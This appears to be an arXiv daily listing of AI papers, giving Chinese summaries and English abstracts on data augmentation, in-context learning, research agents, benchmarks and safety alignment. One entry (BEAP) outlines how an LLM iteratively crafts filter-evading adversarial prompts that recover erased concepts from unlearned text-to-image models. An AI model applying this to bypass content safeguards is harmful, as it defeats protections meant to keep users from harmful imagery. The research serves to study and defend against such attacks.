AI中文摘要

不同的视觉模式在世界中出现的频率不同:例如,沙滩球出现在沙滩上比出现在道路上更常见。这些统计数据反映在视觉数据集中,因此训练好的模型更容易在常见场景中识别物体。然而,在道路上识别沙滩球可能比在沙滩上识别更重要。我们研究如何缓解这种差异。由于在现实世界中收集不常见的图像可能很困难,我们探索生成具有较少频繁上下文的图像是否可以作为有效的训练增强。一个关键挑战是引导生成保持在原始数据集分布附近,同时创建具有不常见上下文的多样化图像。我们引入了DecoupleGen方法,该方法个性化文本到图像扩散模型,以促进罕见上下文图像的连贯合成,同时保留原始视觉细节。生成的图像包含语义上有意义的内容,并在视觉上与原始数据集保持一致。我们进一步应用验证约束以确保增强数据的相关性。我们在复杂场景数据集上的物体分类和识别任务中评估了我们的方法。实验表明,我们的方法比先前的方法有一致的改进,并且我们的分析确定了这些改进背后的因素。

英文摘要

Different visual patterns appear with different frequencies in the world: e.g., beach balls appear on sand more often than they do on a road. These statistics are reflected in vision datasets, and as a result trained models more easily recognize objects in common scenarios. However, recognizing a beach ball on a road may arguably be even more important than recognizing it on sand. We study how to mitigate this discrepancy. Since collecting uncommon images in the real world may be difficult, we explore whether generating images with less frequent contexts can serve as effective training augmentation. A key challenge is guiding generations to remain close to the original dataset distribution while creating diverse images with uncommon contexts. We introduce Decoupling Contextual Patterns with Generations (DecoupleGen), a method that personalizes text-to-image diffusion models to facilitate coherent synthesis of images with rare contexts while preserving original visual details. The generated images contain semantically meaningful content and remain visually aligned with the original datasets. We further apply verification constraints to ensure relevance of the augmented data. We evaluate our approach on object classification and recognition tasks on complex scene datasets. Our experiments demonstrate consistent improvements over previous approaches, and our analyses identify factors underlying these improvements.

2605.26350 2026-05-27 cs.LG cs.AI 版本更新

When Correct Demonstrations Hurt: Rethinking the Role of Exemplars in In-Context Learning

当正确示例有害时:重新思考示例在上下文学习中的作用

Chenghao Qiu, Chunli Peng, Yufeng Yang, Kuan-Hao Huang, Yi Zhou

发表机构 * Texas A&M University(德克萨斯农工大学)

AI总结 本文通过引入任务保持扰动,揭示了正确示例不一定有益甚至可能降低上下文学习准确性的反直觉现象,并提出了上下文证据转移的概念来解释正确性与效用之间的差距。

详情
AI中文摘要

上下文学习(ICL)通常被直觉所驱动,即示例之所以有帮助是因为它们提供了正确的输入-输出对。然而,我们揭示了一个反直觉的现象:正确性并不能保证示例的效用,一些正确的示例甚至可能降低ICL的准确性。为了研究这种正确性-效用差距,我们引入了任务保持扰动,其中仅改变示例输入,而该示例仍然是同一任务的正确实例。具体来说,每个扰动后的示例被赋予由任务映射诱导的目标。该框架涵盖了标签更新扰动(其中任务相关语义发生变化且目标被重新计算)和更严格的目标保持扰动(其中原始目标仍然有效)。我们将由此产生的失败模式形式化为上下文证据转移:任务保持扰动可以改变模型用于上下文推理的有效证据混合,从而将示例正确性与示例效用分离。在情感分类、逻辑推理和数学应用题中,我们发现任务保持扰动的示例会显著降低ICL性能,尤其是对于较小的模型、较难的任务和较高的扰动比例。我们的结果表明,鲁棒的ICL不仅需要评估示例是否正确,还需要评估它们如何影响上下文推理。代码可在 https://github.com/Chenghao-Qiu/Task-Preserving-ICL 获取。

英文摘要

In-context learning (ICL) is often motivated by the intuition that demonstrations help because they provide correct input-output examples. However, we reveal a counterintuitive phenomenon: correctness does not guarantee exemplar utility, and some correct demonstrations can even reduce ICL accuracy. To study this correctness-utility gap, we introduce task-preserving perturbations, where only the exemplar input is changed, while the example remains a correct instance of the same task. Concretely, each perturbed exemplar is assigned the target induced by the task mapping. This framework covers both label-updating perturbations, where task-relevant semantics change and targets are recomputed, and stricter target-preserving perturbations, where the original target remains valid. We formalize the resulting failure mode as contextual evidence shift: task-preserving perturbations can change the effective mixture of evidence used by the model for contextual inference, thereby separating exemplar correctness from exemplar utility. Across sentiment classification, logical reasoning, and math word problems, we find that task-preserving perturbed demonstrations can substantially degrade ICL performance, especially for smaller models, harder tasks, and higher perturbation ratios. Our results show that robust ICL requires evaluating not only whether demonstrations are correct, but also how they influence contextual inference. Code is available at https://github.com/Chenghao-Qiu/Task-Preserving-ICL.
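The two perturbation types named in the abstract can be illustrated on a toy arithmetic task. This is only a sketch: the task, the sentence template, and the names `Exemplar`, `task`, and `make_exemplar` are hypothetical and are not taken from the paper or its repository.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Exemplar:
    text: str
    target: int


def task(a: int, b: int) -> int:
    """Toy task mapping (assumed for illustration): total number of items."""
    return a + b


def make_exemplar(a: int, b: int, name: str = "Ana", item: str = "apples") -> Exemplar:
    """Build an exemplar whose target is always the one induced by the task mapping."""
    text = f"{name} has {a} {item} and buys {b} more. How many {item} does {name} have?"
    return Exemplar(text, task(a, b))


original = make_exemplar(3, 4)
# Target-preserving: only surface details change, so the original target stays valid.
target_preserving = make_exemplar(3, 4, name="Bo", item="pens")
# Label-updating: task-relevant quantities change, so the target is recomputed.
label_updating = make_exemplar(5, 9)
```

All three exemplars are correct instances of the same task. The abstract's claim is that swapping `original` for either perturbed variant in a prompt can still change ICL accuracy.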

2605.26340 2026-05-27 cs.AI cs.CL cs.MA 版本更新

ScientistOne: Towards Human-Level Autonomous Research via Chain-of-Evidence

ScientistOne: 迈向基于证据链的人类级自主研究

Rui Meng, Bhavana Dalvi Mishra, Jiefeng Chen, Chun-Liang Li, Palash Goyal, Mihir Parmar, Yiwen Song, Yale Song, Rajarishi Sinha, Parthasarathy Ranganathan, Burak Gokturk, Jinsung Yoon, Tomas Pfister

发表机构 * Google Cloud AI Research(谷歌云人工智能研究)

AI总结 提出证据链框架Chain-of-Evidence和自主研究系统ScientistOne,通过可追溯性解决可验证性失败问题,在多项任务上达到或超越人类专家水平。

Comments Project website: https://scientist-one.github.io/

详情
AI中文摘要

自主研究代理能产生有竞争力的解决方案和专业手稿,但其输出存在表面评估无法察觉的可验证性失败:捏造的引用、不可复现的分数以及与实现不符的方法描述。我们通过三项贡献解决这一问题。第一,Chain-of-Evidence (CoE),一个可验证性框架,要求每个声明都能追溯到其证据来源。第二,ScientistOne,一个端到端的自主研究系统,在文献综述、解决方案发现和论文撰写过程中通过构造保持证据链。第三,CoE Audit,一个事后审计,其四项完整性检查——分数验证、规范违反、引用验证和方法-代码对齐——统一适用于所有系统。在涵盖五个系统和五个前沿研究任务的75篇论文中,每个基线都表现出至少一种系统性失败模式:幻觉引用率高达21%,分数验证通过率低至42%,方法-代码对齐率在20%到80%之间。ScientistOne实现了零幻觉引用(0/337)、完美的分数验证(12/12)和最高的方法-代码对齐率(14/15),同时在所有五个任务上达到或超过人类专家表现。ScientistOne进一步泛化到涵盖医学影像、细粒度识别、3D感知和语言建模的六个额外任务,在Parameter Golf上取得最先进结果,并在基线完全失败的MLE-Bench任务上获得金牌。

英文摘要

Autonomous research agents produce competitive solutions and professional-looking manuscripts, yet their outputs contain verifiability failures undetectable by surface-level evaluation: fabricated citations, unreproducible scores, and method descriptions that diverge from the implementation. We address this through three contributions. First, Chain-of-Evidence (CoE), a verifiability framework requiring every claim to be traceable to its evidence source. Second, ScientistOne, an end-to-end autonomous research system that maintains evidence chains by construction throughout literature review, solution discovery, and paper writing. Third, CoE Audit, a post-hoc audit whose four integrity checks -- score verification, specification violation, reference verification, and method-code alignment -- apply uniformly to all systems. Across 75 papers spanning five systems and five frontier research tasks, every baseline exhibits at least one systematic failure mode: hallucinated reference rates reach 21%, score verification passes in as few as 42% of papers, and method-code alignment ranges from 20% to 80%. ScientistOne achieves zero hallucinated references (0/337), perfect score verification (12/12), and the highest method-code alignment (14/15), while matching or exceeding human expert performance on all five tasks. ScientistOne further generalizes to six additional tasks spanning medical imaging, fine-grained recognition, 3D perception, and language modeling, achieving state-of-the-art on Parameter Golf and gold medals on MLE-Bench tasks where baselines fail entirely.

2605.26333 2026-05-27 cs.AI 版本更新

Managing Uncertainty in LLM-Generated Procedural Knowledge for Virtual Laboratory Planning

管理虚拟实验室规划中LLM生成程序性知识的不确定性

Polychronis Karpodinis, Dimitris Kalles

发表机构 * School of Science and Technology, Hellenic Open University(希腊开放大学科学与技术学院)

AI总结 针对LLM生成实验程序存在的不确定性,提出一个原型框架,通过结构化领域表示和不确定的状态转移样本提取候选程序规则,转化为显式约束并修复不确定步骤,以提升虚拟实验室规划的可靠性。

详情
AI中文摘要

教育虚拟实验室可以使实验培训更具可扩展性、适应性和可访问性,尤其是在学生接触物理实验室设施有限的情况下。然而,编写新的模拟实验程序仍然成本高昂:教育工作者必须描述新设备,定义仪器和材料如何交互,并指定可在虚拟环境中执行或评估的有效程序流程。大型语言模型可以通过生成详细的实验程序来辅助这一编写过程,但其输出不应被视为可直接执行的计划。它们可能遗漏必要的操作,步骤顺序错误,或产生逻辑上不正确或与实验室设备不兼容的指令。本文提出了一个用于管理虚拟实验室规划中LLM生成程序性知识不确定性的原型框架。该框架旨在通过使用结构化领域表示和不确定的LLM生成状态转移样本来提取候选程序规则,将其转化为显式且可检查的约束,并利用它们修复不确定的程序步骤,从而减少程序不确定性。尽管动机领域是教育虚拟实验室,但底层问题更为普遍:在结构化交互环境中管理用于行动规划的不确定程序性知识。我们通过一个涉及实验室仪器、容器、工具和材料转移操作的虚拟实验室领域来展示该方法。

英文摘要

Educational virtual laboratories can make experimental training more scalable, adaptive, and accessible, especially when students have limited access to physical laboratory facilities. However, authoring new simulated laboratory procedures remains costly: educators must describe new equipment, define how instruments and materials interact, and specify valid procedural flows that can be executed or assessed inside the virtual environment. Large language models can assist in this authoring process by generating detailed experimental procedures, but their output should not be treated as directly executable plans. They may omit necessary actions, arrange steps in the wrong order, or produce instructions that are logically incorrect or incompatible with the laboratory equipment. This paper presents a prototype framework for managing uncertainty in LLM-generated procedural knowledge for virtual laboratory planning. The framework aims to reduce procedural uncertainty by using structured domain representations and uncertain LLM-generated state-transition samples to extract candidate procedural rules, transform them into explicit and inspectable constraints, and use them to repair uncertain procedural steps. Although the motivating domain refers to educational virtual laboratories, the underlying problem is more general: managing uncertain procedural knowledge for action planning in structured interactive environments. We illustrate the approach in a virtual laboratory domain involving laboratory instruments, containers, tools, and material-transfer actions.

2605.26332 2026-05-27 cs.CV cs.AI 版本更新

Erased but Exploitable: Black-box Embedding-Aware Prompting Against Unlearned Text-to-Image Diffusion Models

被擦除但可被利用:针对已遗忘文本到图像扩散模型的黑盒嵌入感知提示攻击

Arian Komaei Koma, Seyed Amir Kasaei, AmirMahdi Sadeghzadeh, Mohammad Hossein Rohban

发表机构 * Department of Computer Engineering(计算机工程系)

AI总结 提出一种黑盒嵌入感知对抗提示攻击BEAP,利用大语言模型迭代生成有效对抗提示,以恢复被遗忘概念,并在攻击成功率上提升超过60%。

详情
AI中文摘要

机器遗忘旨在从预训练的文本到图像扩散模型中移除特定概念,然而已有多种白盒和黑盒攻击被提出以使模型生成这些被遗忘的概念。然而,这些攻击并未假设现实的威胁模型,即它们要么假设可以访问模型权重,要么产生无意义的对抗提示,即使通过简单的基于规则的防护也能轻易检测到。本文旨在填补这一空白。我们提出BEAP,一种黑盒、嵌入感知的对抗提示攻击,利用大语言模型(LLM)迭代生成有效的对抗提示并利用这些隐藏的漏洞。BEAP在文本空间中执行嵌入感知搜索,结合多个奖励信号:被遗忘概念的存在性、文本-图像对齐和图像质量,以优化生成的提示。与之前的攻击方法不同,BEAP使其提示对安全过滤器不可检测,同时生成高质量图像。大量实验表明,BEAP的攻击成功率(ASR)比先前方法提高了60%以上,而每次成功攻击平均仅需15个提示。警告:本文包含可能具有冒犯性或令人不安性质的模型输出。

英文摘要

Machine unlearning aims to remove specific concepts from pretrained text-to-image diffusion models, yet several white- and black-box attacks have been introduced to make the model generate such unlearned concepts. These attacks, nevertheless, do not assume a realistic threat model, i.e. they either assume access to the model weights, or result in gibberish adversarial prompts that could be easily detected even through naive rule-based safeguarding. We aim to address this gap in this paper. We introduce BEAP, a black-box, embedding-aware adversarial prompting attack that leverages a large language model (LLM) to iteratively generate effective adversarial prompts and exploit such hidden vulnerabilities. BEAP performs an embedding-aware search in text space, combining multiple reward signals: unlearned concept presence, text-image alignment, and image quality, to refine generated prompts. Unlike previous attack methods, BEAP keeps its prompts undetectable to safety filters while producing high-quality images. Extensive experiments show that BEAP improves the Attack Success Rate (ASR) by more than 60% over prior methods, while requiring only an average of fifteen prompts per successful attack. Warning: This paper contains model outputs that may be offensive or upsetting in nature.

2605.26329 2026-05-27 cs.AI 版本更新

JobBench: Aligning Agent Work With Human Will

JobBench:使智能体工作符合人类意愿

Yuetai Li, Yichen Feng, Zhangchen Xu, Zixian Ma, Kaiyuan Zheng, Fengqing Jiang, Xinghua Sun, Rulin Shao, Zichen Chen, Yue Huang, Xinyang Han, Brian Lee, Kayla Xu, Shenglai Zeng, Hang Hua, Xiangliang Zhang, Basel Alomair, Ranjay Krishna, Luke Zettlemoyer, Pang Wei Koh, Bhaskar Ramasubramanian, Luyao Niu, Xiang Yue, Radha Poovendran

发表机构 * University of Washington(华盛顿大学) University of California, Santa Barbara(加州大学圣芭芭拉分校) Stanford University(斯坦福大学) Carnegie Mellon University(卡内基梅隆大学) Northwestern University(西北大学) University of Notre Dame(圣母大学) University of California, Berkeley(加州大学伯克利分校) Michigan State University(密歇根州立大学) MIT-IBM Watson AI Lab(MIT-IBM沃森人工智能实验室) Bake AI King Abdulaziz City for Science and Technology(国王阿卜杜勒阿齐兹科技城) Western Washington University(西华盛顿大学) University of Chicago(芝加哥大学)

AI总结 提出JobBench基准,通过专家识别的高优先级工作流程评估AI智能体,以人类需求为中心而非经济价值,覆盖35个职业的130个任务,使用事实锚定的评分链评估,最强模型仅达45.9%,旨在推动从替代到增强的劳动力市场影响。

详情
AI中文摘要

当前职业AI智能体的基准主要基于经济价值,讲述了一个替代的故事。我们引入了JobBench,该基准根据专家识别为高优先级委托的工作流程评估AI智能体,基于人类需求赋权,而非用GDP价值替代他们。JobBench覆盖了35个职业的130个智能体任务。每个任务被打包成一个包含异构参考文件的工作空间,要求智能体在真实专业工作的杂乱信息流中进行推理。输出由事实锚定的评分链进行评分,每个任务平均有35.6个二元标准。我们评估了36个模型;最强的Claude Opus 4.7在Claude Code下仅达到45.9%。我们希望JobBench将社区的目标劳动力市场影响从替代转向增强:构建能够完成人类真正希望委托的任务的智能体,而不仅仅是经济价值最高的任务。

英文摘要

Current benchmarks for occupational AI agents are scoped primarily by economic values, telling a replacement story. We introduce JobBench, which evaluates AI agents on the workflows that experts identify as high-priority for delegation, empowering humans based on their needs instead of replacing them with GDP value. JobBench covers 130 agentic tasks across 35 occupations. Each task is packaged as a workspace of heterogeneous reference files, requiring the agent to reason through the cluttered information streams of real professional work. Outputs are graded by a fact-anchored chain of rubrics, averaging 35.6 binary criteria per task. We evaluate 36 models; the strongest, Claude Opus 4.7 under Claude Code, reaches only 45.9%. We hope JobBench shifts the community's target labour-market effect from replacement to enhancement: building agents that do what humans actually want delegated, not only what is most economically valuable.

2605.26324 2026-05-27 cs.LG cs.AI cs.NA math.NA 版本更新

Semigroup Consistency as a Diagnostic for Learned Physics Simulators

半群一致性作为学习型物理模拟器的诊断工具

Lennon J. Shikhman

发表机构 * Georgia Institute of Technology(佐治亚理工学院)

AI总结 提出归一化半群误差作为评估学习型物理模拟器时间组合和长程推演一致性的诊断指标,在热传导和Burgers动力学实验中验证其与推演退化正相关。

Comments 10 pages, 3 figures, 3 tables. Accepted to the AI4Physics Workshop at the 43rd International Conference on Machine Learning

详情
AI中文摘要

学习型物理模拟器通常通过单步或短时预测误差来评估,但这些指标可能遗漏时间组合和长程推演中的失败。对于自主、状态完备的系统,精确解映射满足半群定律:直接演化 $s+t$ 应与先演化 $s$ 再演化 $t$ 一致。我们提出归一化半群误差作为事后、模型无关的诊断,比较这些直接和组合的学习预测。在带有时间条件ConvNet和FNO基线的一维热传导和Burgers动力学中,半群误差与推演退化正相关,轨迹级Spearman相关系数 $\rho = 0.635$,95%置信区间 $[0.621, 0.649]$。半群正则化效果不一,支持半群一致性主要作为评估诊断而非普遍有益的训练目标。

英文摘要

Learned physics simulators are often evaluated by one-step or short-horizon prediction error, but these metrics can miss failures in temporal composition and long-horizon rollout. For autonomous, state-complete systems, exact solution maps satisfy a semigroup law: direct evolution over $s+t$ should agree with evolution over $s$ followed by $t$. We propose normalized semigroup error as a post hoc, model-agnostic diagnostic comparing these direct and composed learned predictions. On one-dimensional heat and Burgers dynamics with time-conditioned ConvNet and FNO baselines, semigroup error is positively associated with rollout degradation, with trajectory-level Spearman correlation $\rho = 0.635$ and $95\%$ CI $[0.621, 0.649]$. Semigroup regularization has mixed effects, supporting semigroup consistency primarily as an evaluation diagnostic rather than a universally beneficial training objective.
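The semigroup check described in the abstract can be sketched in a few lines. This is an illustration under stated assumptions, not the authors' implementation: the normalization (dividing by the norm of the direct prediction), the function names, and the hypothetical `biased_step` simulator are all assumed here. The exact spectral heat propagator stands in for a time-conditioned model.

```python
import numpy as np


def heat_step(u, t, nu=0.1, length=2 * np.pi):
    """Exact periodic 1-D heat propagator: evolve state u forward by time t."""
    n = u.shape[-1]
    k = 2 * np.pi * np.fft.fftfreq(n, d=length / n)  # angular wavenumbers
    return np.real(np.fft.ifft(np.fft.fft(u) * np.exp(-nu * k**2 * t)))


def biased_step(u, t, nu=0.1):
    """Hypothetical imperfect simulator: applies the same damping error on every call."""
    return 0.98 * heat_step(u, t, nu)


def semigroup_error(model, u0, s, t, eps=1e-12):
    """Relative L2 gap between the direct (s + t) and composed (s, then t) predictions."""
    direct = model(u0, s + t)
    composed = model(model(u0, s), t)
    return np.linalg.norm(direct - composed) / (np.linalg.norm(direct) + eps)


x = np.linspace(0.0, 2 * np.pi, 64, endpoint=False)
u0 = np.sin(x) + 0.5 * np.sin(3 * x)

err_exact = semigroup_error(heat_step, u0, s=0.3, t=0.7)
err_biased = semigroup_error(biased_step, u0, s=0.3, t=0.7)
print(err_exact, err_biased)
```

The exact propagator satisfies the semigroup law up to floating-point error. The biased model applies its 2% damping once on the direct path and twice on the composed path, so the two predictions disagree by a relative gap of about 0.02. The diagnostic needs only model calls and no ground-truth trajectory, which is what makes it post hoc and model-agnostic.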

2605.26322 2026-05-27 cs.AI 版本更新

OmniToM: Benchmarking Theory of Mind in LLMs via Explicit Belief Modeling

OmniToM:通过显式信念建模评估大语言模型的心智理论

Adam Bawatneh, Sagar Sapkota, Amrit Singh Bedi, Santu Karmaker, Mubarak Shah

发表机构 * University of Central Florida(中佛罗里达大学)

AI总结 提出OmniToM基准,通过显式信念结构(包括信念提取和标签化两阶段)评估LLM在叙事中追踪不同角色心智状态的能力,揭示其在知识获取和表征决策上的瓶颈。

Comments 30 pages, 8 figures, 19 tables; includes appendix

详情
AI中文摘要

心智理论(ToM)——推断他人知识、意图和情绪的能力——通常通过端点问答在大语言模型(LLM)中评估,其性能仅由对社交推理查询的最终答案判断。这种范式掩盖了模型是否真正构建了稳健推理所需的基础心智状态表征,尤其是在涉及分歧、演变或错误信念的场景中。为填补这一研究空白,我们引入OmniToM,一个通过要求对叙事中所有相关角色显式建模信念结构来直接评估这些表征的基准。这些结构由信念命题组成:关于角色认为世界或他人心智状态为真的最小陈述,使得知识、意图、情绪和错误信念能以通用格式分析。模型分两阶段评估:阶段1:信念提取,从故事中提取与社会动态相关的信念;阶段2:信念标签化,为每个信念分配一个七维模式标签,涵盖递归顺序、真值状态、知识获取、显式性、内容类型、心智来源和上下文。基于现有ToMBench故事语料库中的895个故事,并扩充了22,343个标记的信念命题,OmniToM使用人类校准的LLM辅助标注流水线。在零样本评估中,OmniToM揭示了不同模型存在特定角色的信念追踪瓶颈:当前LLM难以将叙事事实转化为角色信念和共享心智状态所需的知识获取和表征决策。

英文摘要

Theory of Mind (ToM), the ability to infer others' knowledge, intentions, and emotions, is commonly evaluated in large language models (LLMs) using end-point question answering, where performance is judged solely by the final answer to a social reasoning query. This paradigm obscures whether the model actually constructs the underlying mental-state representations required for robust reasoning, particularly in scenarios involving divergent, evolving, or mistaken beliefs. In order to address this research gap, we introduce OmniToM, a benchmark that directly evaluates these representations by requiring explicit modeling of belief structures for all relevant actors within a narrative. These structures are composed of belief propositions: minimal statements of what an actor takes to be true about the world or another actor's mental state, allowing knowledge, intentions, emotions, and false beliefs to be analyzed in a common format. Models are evaluated in two stages: Stage 1: Belief Extraction, which extracts from the story the beliefs relevant to its social dynamics, and Stage 2: Belief Labeling, which assigns each belief a seven-dimensional schema label covering recursive order, truth status, knowledge access, explicitness, content type, mental source, and context. Built from 895 stories from the existing ToMBench story corpus and augmented with 22,343 labeled belief propositions, OmniToM uses a human-calibrated LLM-assisted annotation pipeline. Across diverse models in zero-shot evaluation, OmniToM reveals an actor-specific belief-tracking bottleneck: current LLMs struggle with the knowledge-access and representational decisions required to transform narrative facts into actors' beliefs and shared mental states.

2605.26321 2026-05-27 cs.AI 版本更新

Anchor: Mitigating Artifact Drift in Agent Benchmark Generation

Anchor:缓解智能体基准生成中的工件漂移

Maksim Ivanov, Abhijay Rana

发表机构 * Agentic Labs

AI总结 提出Anchor管道,通过约束优化程序联合生成指令、环境、真值解和验证器,解决基准生成中的工件漂移问题,并构建ERP-Bench基准评估前沿模型性能。

Comments Accepted to RLEval '26 (Workshop at ACM Conference on AI and Agentic Systems 2026)

详情
AI中文摘要

AI智能体开始完成有价值的、长期的企业运营任务,但企业工作的训练和评估环境仍然难以平衡真实性、可验证性和规模。环境和任务创建经常遭受一种我们称之为工件漂移的失败模式:当指令、环境、预言机和验证器由松散耦合的过程创建时,它们经常对任务要求产生分歧,产生不可解、可奖励黑客或不一致的环境。我们引入Anchor,一个任务生成管道,将领域专家对业务工作流的规范形式化为约束优化程序。从单一参数化规范出发,该管道联合生成自然语言指令、环境配置、求解器认证的真实解和基于状态的验证器。使用Anchor,改变参数会产生具有可控难度和已知最优解的新任务,产生与框架无关的环境,其奖励仅取决于最终状态的业务正确性。我们应用Anchor生成ERP-Bench:一个包含300个长期任务的基准,涵盖生产级ERP系统中的采购和制造工作流。我们发现生成参数可预测实际难度,前沿模型在26.1%的试验中满足显式任务约束,但仅在17.4%的试验中达到完全最优解。总体而言,我们表明Anchor和ERP-Bench为构建具有经济价值的智能体工作的可审计评估环境提供了具体方法。我们在erpbench.ai发布任务生成器和ERP-Bench数据集。

英文摘要

AI agents are beginning to complete valuable, long-horizon business operations tasks, but training and evaluation environments for enterprise work still struggle to balance realism, verifiability, and scale. Environment and task creation frequently suffers from a failure mode we call artifact drift: when instructions, environments, oracles, and verifiers are created by loosely coupled processes, they frequently disagree on what a task requires, producing environments that are unsolvable, reward-hackable, or inconsistent. We introduce Anchor, a task-generation pipeline that formalizes domain experts' specifications of business workflows into constraint optimization programs. From a single parametric specification, the pipeline jointly produces a natural-language instruction, environment configuration, solver-certified ground-truth solution, and state-based verifier. With Anchor, altering parameters yields new tasks with controlled difficulty and known optimal solutions, producing harness-agnostic environments whose rewards depend solely on end-state business correctness. We apply Anchor to produce ERP-Bench: a benchmark of 300 long-horizon tasks spanning procurement and manufacturing workflows in a production-grade ERP system. We find that generation parameters predict realized difficulty, and that frontier models satisfy explicit task constraints in 26.1% of trials but reach a fully optimal solution in only 17.4% of trials. Overall, we show that Anchor and ERP-Bench offer a concrete recipe for building auditable evaluation environments for economically valuable agent work. We release the task generator and ERP-Bench dataset at erpbench.ai.

2605.26316 2026-05-27 cs.CV cs.AI 版本更新

E$^3$C: Video Generation with 3D Environmental Memory and Ego-Exo Human Pose Control

E$^3$C: 具有3D环境记忆和自我-外部人体姿态控制的视频生成

Qiao Gu, Lingni Ma, Adam W Harley, Richard Newcombe, Florian Shkurti, Julian Straub

发表机构 * Meta Reality Labs(Meta现实实验室) University of Toronto(多伦多大学)

AI总结 提出E$^3$C可控视频扩散框架,通过3D点云记忆和双通道人体控制(自我与外部),实现物理一致的自我中心视频生成。

Comments Preprint. Project Page: https://e3c-videogen.github.io/

详情
AI中文摘要

可控且物理合理的自我中心视频生成对于具身智能体推理自身及他人动作如何表现和改变世界至关重要。与通用视频合成相比,自我中心生成尤其具有挑战性:相机与演员紧密耦合,导致视角快速变化和频繁的自遮挡;底层动作细微、关节化,且通常仅部分可见;人和场景状态必须与指定控制一致地演化。我们提出E$^3$C,一种用于自我中心生成的可控视频扩散框架,构建结构化和紧凑的条件,将持久场景结构与人类驱动动态分离。从上下文帧中,E$^3$C构建基于半稠密点云的3D记忆,并用来自视频VAE特征的外观描述符增强每个点。将此记忆渲染到目标视角产生与目标帧对齐的条件。人类动态单独建模。场景中观察到的人由骨架渲染(外部人体控制)控制,而相机佩戴者由其3D身体关节和6DoF手腕运动(自我人体控制)指定。为了在佩戴者身体部位不可见时保持自我人体控制,我们引入了一个自我运动编码器,生成持久的交叉注意力标记。在Nymeria上的实验表明,E$^3$C在视觉保真度、相机运动准确性、物体一致性以及自我和外部人体控制方面优于强基线,同时还能实现直观的场景编辑。

英文摘要

Controllable and physically grounded egocentric video generation is essential for embodied agents to reason about how their own and others' actions manifest and change the world. Compared to generic video synthesis, egocentric generation is especially challenging: the camera is tightly coupled to the actor, leading to rapid viewpoint changes and frequent self-occlusions; the underlying actions are subtle, articulated, and often only partially visible; and both the people and the scene state must evolve consistently with the specified controls. We present E$^3$C, a controllable video diffusion framework for egocentric generation that builds structured and compact conditions disentangling persistent scene structure from human-driven dynamics. From context frames, E$^3$C constructs a semi-dense point cloud-based 3D memory and augments each point with appearance descriptors from video-VAE features. Rendering this memory into target viewpoints produces conditioning aligned with the target frames. Human dynamics are modeled separately. The observed people in the scene are controlled by skeleton renderings (exo human control), while the camera wearer is specified by their 3D body joints and 6DoF wrist motion (ego human control). To preserve ego human control when the wearer's body parts are invisible, we introduce an ego motion encoder that produces persistent cross-attention tokens. Experiments on Nymeria show that E$^3$C improves visual fidelity, camera-motion accuracy, object consistency, and ego & exo human control over strong baselines, while also enabling intuitive scene editing.

2605.26315 2026-05-27 cs.LG cs.AI 版本更新

Curriculum Learning for Safety Alignment

用于安全对齐的课程学习

Sandeep Kumar, Virginia Smith, Chhavi Yadav

发表机构 * Carnegie Mellon University(卡内基梅隆大学) Simons Institute, UC Berkeley(加州大学伯克利分校Simons研究所)

AI总结 提出基于课程学习的Staged-Competence框架,通过难度分级的偏好数据和渐进式参考模型更新,提升DPO安全对齐的鲁棒性,在三个模型族上平均降低16%的OOD有害响应率和20%的越狱攻击成功率。

Comments Accepted at the ICML 2026 GlobalSouthML Workshop

详情
AI中文摘要

直接偏好优化(DPO)广泛用于大型语言模型的安全对齐。然而,先前的工作表明它脆弱且表现出较差的分布外(OOD)泛化能力。在本文中,我们研究课程学习是否能提高基于DPO的安全对齐的鲁棒性。我们提出Staged-Competence,一个基于课程的框架,它按难度组织偏好数据,采用基于能力的采样,并在训练过程中逐步更新参考模型。在三个模型族上平均,Staged-Competence将OOD有害响应率降低16%,越狱攻击成功率降低20%,同时保持接近零的过度拒绝,保留通用能力。我们进一步表明,Staged-Competence(1)仅使用75%的训练数据即可达到基线安全性,(2)在安全与不安全响应之间产生更好的分离。Staged-Competence与策略优化损失无关,并可扩展到其他DPO变体和对齐领域。我们的代码和数据可在https://github.com/Sandeep5500/curriculum-learning-for-safety获取。

英文摘要

Direct Preference Optimisation (DPO) is widely used for safety alignment in large language models. However, prior work shows it is brittle and exhibits poor out-of-distribution (OOD) generalisation. In this paper, we investigate whether Curriculum Learning can improve the robustness of DPO-based safety alignment. We propose Staged-Competence, a curriculum-based framework that organises preference data by difficulty, employs competence-based sampling, and progressively updates the reference model during training. Averaged across three model families, Staged-Competence reduces OOD harmful response rates by 16% and jailbreak attack success rates by 20%, while preserving general capabilities with near-zero over-refusal. We further show that Staged-Competence (1) matches baseline safety with only 75% of the training data and (2) yields better separation between safe and unsafe responses. Staged-Competence is agnostic to the policy optimisation loss and can extend to other DPO variants and alignment domains. Our code and data are available at https://github.com/Sandeep5500/curriculum-learning-for-safety.
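The abstract does not specify the difficulty measure or the competence schedule, so the following is only a sketch of how difficulty-ordered, competence-based sampling could sit next to the standard DPO loss. The square-root schedule, the initial competence `c0`, the random difficulty scores, and all function names are assumptions rather than the paper's choices.

```python
import numpy as np


def dpo_loss(pi_chosen, pi_rejected, ref_chosen, ref_rejected, beta=0.1):
    """Standard DPO loss from sequence log-probabilities under policy and reference."""
    margin = beta * ((pi_chosen - ref_chosen) - (pi_rejected - ref_rejected))
    # -log(sigmoid(margin)), computed stably as log(1 + exp(-margin))
    return np.logaddexp(0.0, -margin).mean()


def competence(step, total_steps, c0=0.2):
    """Assumed square-root schedule: fraction of difficulty-sorted data unlocked at `step`."""
    return min(1.0, float(np.sqrt(step * (1.0 - c0**2) / total_steps + c0**2)))


def sample_batch(difficulty, step, total_steps, batch_size, rng):
    """Sample indices uniformly from the easiest competence(step) fraction of pairs."""
    order = np.argsort(difficulty)  # easiest first
    n_unlocked = max(batch_size, int(np.ceil(competence(step, total_steps) * len(order))))
    return rng.choice(order[:n_unlocked], size=batch_size, replace=False)


rng = np.random.default_rng(0)
difficulty = rng.random(100)  # hypothetical per-pair difficulty scores
early = sample_batch(difficulty, step=0, total_steps=1000, batch_size=8, rng=rng)
late = sample_batch(difficulty, step=1000, total_steps=1000, batch_size=8, rng=rng)
```

Early batches draw only from the easiest pairs, while late batches draw from the full pool. In a staged variant, the reference log-probabilities passed to `dpo_loss` would be recomputed from a snapshot of the current policy at each stage boundary, which is one plausible reading of "progressively updates the reference model".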

2605.26307 2026-05-27 cs.CR cs.AI cs.NI 版本更新

Intelligent Detection and Mitigation of Carpet-Bombing DDoS Attacks in SDN Using Retrieval-Augmented Generation and Large Language Models

基于检索增强生成和大语言模型的SDN中地毯式轰炸DDoS攻击的智能检测与缓解

Mohammed N. Swileh, Shengli Zhang, Kai Lei

